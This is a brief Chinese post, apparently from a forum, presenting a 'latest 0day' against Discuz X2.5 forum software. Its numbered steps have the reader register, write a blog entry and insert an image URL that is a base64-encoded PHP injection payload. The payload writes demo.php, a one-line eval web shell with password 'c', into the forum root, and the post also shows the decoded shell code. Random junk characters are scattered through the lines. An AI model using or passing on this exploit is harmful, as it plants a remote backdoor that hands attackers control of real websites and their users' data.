DZ X2.5最新0day e; W I/ D6 i
1.注册任意账户
8 G) s9 l+ ?$ ?2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了
y2 l/ a# v/ h+ z& [3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码: ?/ h4 ~: i1 {0 L- K' z5 K
<?php @eval($_POST[c]); ?>ok5 ^) Q8 e4 c' c% S3 v
<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?>
9 S3 S0 ?/ [6 w" Q) G8 A+ P+ Y8 v4.访问日志,论坛根目录下生成demo.php,一句发密码C |